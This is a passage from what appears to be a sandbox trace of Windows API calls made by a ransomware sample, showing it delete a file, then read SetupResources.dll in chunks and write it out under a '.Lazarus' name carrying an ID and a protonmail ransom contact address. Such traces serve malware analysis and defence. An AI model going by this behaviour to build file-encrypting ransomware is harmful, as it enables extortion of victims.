CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0061.104] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.106] GetFileType (hFile=0x41c) returned 0x1 [0061.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.106] GetLastError () returned 0xb7 [0061.106] SetLastError (dwErrCode=0xb7) [0061.106] WriteFile (in: hFile=0x41c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.107] CloseHandle (hObject=0x41c) returned 1 [0061.107] AreFileApisANSI () returned 1 [0061.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0061.107] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0061.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.109] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.110] AreFileApisANSI () returned 1 [0061.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.110] AreFileApisANSI () returned 1 [0061.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0061.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0061.110] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.110] GetFileType (hFile=0x41c) returned 0x1 [0061.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.110] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.111] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.111] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.111] CloseHandle (hObject=0x41c) returned 1 [0061.222] AreFileApisANSI () returned 1 [0061.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0061.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0061.222] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.222] GetFileType (hFile=0x420) returned 0x1 [0061.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.222] CloseHandle (hObject=0x420) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.223] AreFileApisANSI () returned 1 [0061.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0061.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0061.223] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358)) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.223] AreFileApisANSI () returned 1 [0061.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.223] GetLastError () returned 0x0 [0061.223] SetLastError (dwErrCode=0x0) [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0061.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0061.224] GetLastError () returned 0x0 [0061.224] SetLastError (dwErrCode=0x0) [0061.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x715b8 [0061.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0061.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.224] AreFileApisANSI () returned 1 [0061.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0061.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0061.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0061.224] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.225] GetFileType (hFile=0x420) returned 0x1 [0061.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0061.225] AreFileApisANSI () returned 1 [0061.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0061.225] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.225] GetFileType (hFile=0x428) returned 0x1 [0061.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0061.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.225] GetLastError () returned 0x0 [0061.225] SetLastError (dwErrCode=0x0) [0061.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.225] GetLastError () returned 0x0 [0061.226] SetLastError (dwErrCode=0x0) [0061.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.226] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0061.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0061.228] GetLastError () returned 0x0 [0061.228] SetLastError (dwErrCode=0x0) [0061.228] GetLastError () returned 0x0 [0061.228] SetLastError (dwErrCode=0x0) [0061.229] GetLastError () returned 0x0 [0061.229] SetLastError (dwErrCode=0x0) [0061.229] GetLastError () returned 0x0 [0061.229] SetLastError (dwErrCode=0x0) [0061.229] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.229] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.230] GetLastError () returned 0x0 [0061.230] SetLastError (dwErrCode=0x0) [0061.230] GetLastError () returned 0x0 [0061.230] SetLastError (dwErrCode=0x0) [0061.230] GetLastError () returned 0x0 [0061.230] SetLastError (dwErrCode=0x0) [0061.230] GetLastError () returned 0x0 [0061.230] SetLastError (dwErrCode=0x0) [0061.230] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.231] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.231] GetLastError () returned 0x0 [0061.231] SetLastError (dwErrCode=0x0) [0061.231] GetLastError () returned 0x0 [0061.231] SetLastError (dwErrCode=0x0) [0061.231] GetLastError () returned 0x0 [0061.231] SetLastError (dwErrCode=0x0) [0061.231] GetLastError () returned 0x0 [0061.231] SetLastError (dwErrCode=0x0) [0061.231] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.232] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.232] GetLastError () returned 0x0 [0061.232] SetLastError (dwErrCode=0x0) [0061.232] GetLastError () returned 0x0 [0061.232] SetLastError (dwErrCode=0x0) [0061.232] GetLastError () returned 0x0 [0061.232] SetLastError (dwErrCode=0x0) [0061.232] GetLastError () returned 0x0 [0061.232] SetLastError (dwErrCode=0x0) [0061.232] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x358, lpOverlapped=0x0) returned 1 [0061.232] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.232] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, 